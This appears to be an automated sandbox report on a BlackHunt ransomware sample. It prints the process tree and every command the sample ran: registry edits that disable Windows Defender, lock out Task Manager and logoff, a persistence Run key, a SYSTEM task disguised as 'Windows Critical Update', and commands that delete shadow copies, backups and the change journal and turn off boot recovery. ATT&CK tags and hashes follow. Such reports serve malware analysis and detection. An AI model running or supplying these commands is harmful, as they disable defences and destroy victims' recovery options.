C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2828
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1032
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3840
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4120
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:4984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1168
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:3576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4896
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3556
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4424
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:3768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:656
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:544
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:3596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:492
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4808
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4616
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:768
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3392
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2216
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:3652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:3740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1748
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe" /F2⤵PID:3012
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe" /F3⤵
- Creates scheduled task(s)
PID:2284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4416
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2272
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2336
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4708
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2112
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:808
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:4612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1244
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3620
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4192
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:4468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:256
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3984
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1348
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4836
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5712
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:4572
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51da105bcb1e78dde28e0d4d5717c3b55
SHA1f4cf192d63129dfa05bb317865139adec20d8617
SHA256a1121fe82813f4dbc9dd0422954713886e438404c810b5cdb5de30717987dc38
SHA51295b9f6f1a999b775310c006b07ad69301244eab78fdf71ef0fb1c98b16406d47b7eb6fccd526bab0d90cf21c676993311c8702ddec146000c9cca21fed33322c
-
Filesize
684B
MD56893c5e6ffe7288d18efdba2f604472a
SHA1516f4bb47c346dd49100bd45bd8967ea33c3d99b
SHA256669aecffaaa80daa8050f086a9badfd99fc9b914ee6147ab32b140b85c145a2c
SHA512d8f6a0c519a62af4a6a8ae189a245c0b1ccce6b46629179b7540b8dd0fe0c7e70f6566b57390fbef477fad142f47ea51045abc01501b34897cf8b99439f004f6
-
Filesize
12KB
MD5c14ad6174e7c5e159e94beba4c54cb6b
SHA10104346f46a555127b3f08458fd60b6a686bdb64
SHA256ee527bb61138d5a73ab12ebeb1727554c4289c546450b727f75f1963a47bb43c
SHA5126e2e369d6dce83dcf6757ad32014c1715506486badbcd54ffe1386750194efa40f2903d9fe0df33daba3eefd49e45abf0a2965da42308207ed1bf1756e014be7